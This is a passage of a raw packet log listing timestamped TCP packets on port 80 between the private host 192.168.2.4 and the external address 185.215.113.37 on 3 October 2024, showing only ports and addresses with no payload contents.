Oct 3, 2024 18:38:13.523029089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.523063898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.523078918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.523097992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.523113012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.523133993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.523144007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.523180962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.524018049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.524053097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.524077892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.524085999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.524096966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.524132013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.524871111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.524907112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.524924994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.524940968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.524954081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.524987936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.525823116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.525859118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.525892973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.525895119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.525913954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.525929928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.525957108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.525975943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.526612043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.526647091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.526671886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.526681900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.526701927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.526732922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.527554035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.527587891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.527621031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.527868032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.528502941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.528537989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.528567076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.528570890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.528604031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.528606892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.528621912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.528664112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.529421091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.529455900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.529480934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.529490948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.529508114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.529541016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.530534029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.530570030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.530602932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.530607939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.530622005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.530648947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.531727076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.531760931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.531789064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.531794071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.531806946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.531830072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.531846046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.531883001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.532422066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.532457113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.532490015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.532490969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.532500029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.532540083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.533036947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.533071995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.533091068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.533104897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.533122063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.533157110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.533749104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.533783913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.533801079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.533817053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.533833027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.533852100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.533865929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.533888102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.533904076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.533942938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.534806013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.534840107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.534857988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.534873962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.534885883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.534910917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.534920931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.534956932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.535883904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.535912037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.535928965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.535940886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.535949945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.535968065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.535972118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.535996914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.535996914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.536024094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.536757946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.536777020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.536792994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.536803961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.536808968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.536815882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.536834002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.536850929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.537739992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.537759066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.537775040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.537791014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.537791967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.537805080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.537806988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.537821054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.537839890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.537859917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.538817883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.538835049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.538853884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.538870096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.538872957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.538885117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.538912058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.538927078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.539628029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.539649010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.539669991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.539679050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.539688110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.539691925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.539710045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.539712906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.539738894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.539757013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.541013956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541032076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541073084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.541088104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.541563034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541585922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541601896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541616917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541625977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.541646957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.541681051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.541906118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541922092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541930914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541945934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541960001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.541973114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.541996956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.542773008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.542789936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.542804956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.542819977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.542831898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.542860985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.543704033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.543721914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.543736935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.543752909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.543776035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.543787956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.543804884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.543826103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.544414043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.544478893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.544495106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.544509888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.544657946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.545334101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.545351982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.545366049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.545382023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.545389891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.545404911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.545413971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.546159983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.546178102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.546192884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.546209097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.546226025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.546226978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.546256065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.546310902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.546973944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.546989918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.547005892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.547033072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.547048092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.559328079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.559381008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.559479952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.559513092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.559529066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.559559107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.559732914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.559766054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.559781075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.559799910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.559812069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.559834957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.559844971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.559884071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.560545921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.560590982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.593213081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.593252897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.593271017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.593301058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.593310118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.593317986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.593333006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.593343973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.593369007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.593396902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.593408108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.594079018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.594114065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.594130993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.594147921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.594160080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.594182968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.594196081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.594233990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.594777107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.594814062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.594827890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.594847918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.594861984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.594883919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.594893932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.594929934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.595473051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.595489025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.595503092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.595518112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.595523119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.595535994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.595535994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.595582008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.595597029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.596533060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.596549988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.596565962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.596579075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.596581936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.596595049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.596596956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.596613884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.596626997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.596646070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.597352982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.597377062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.597390890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.597408056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.597409010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.597419977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.597424984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.597440958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.597455025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.597466946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.598243952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.598259926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.598273993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.598289967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.598294020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.598304987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.598306894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.598321915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.598342896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.598357916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.599117041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.599133968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.599148035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.599164009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.599178076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.599184990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.599184990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.599184990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.599224091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.599245071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.599975109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.599992037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.600007057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.600020885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.600023985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.600034952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.600049019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.600064039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.600617886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.600634098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.600647926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.600663900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.600665092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.600672960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.600682020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.600701094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.600711107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.600723028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.601197958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.601213932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.601228952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.601244926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.601246119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.601257086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.601262093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.601274967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.601279020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.601289988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.601309061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.601319075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.601995945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602013111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602026939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602042913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602044106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.602055073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.602060080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602075100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.602080107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.602089882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.602107048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.602138996 CEST	49730	80	192.168.2.4	185.215.113.37
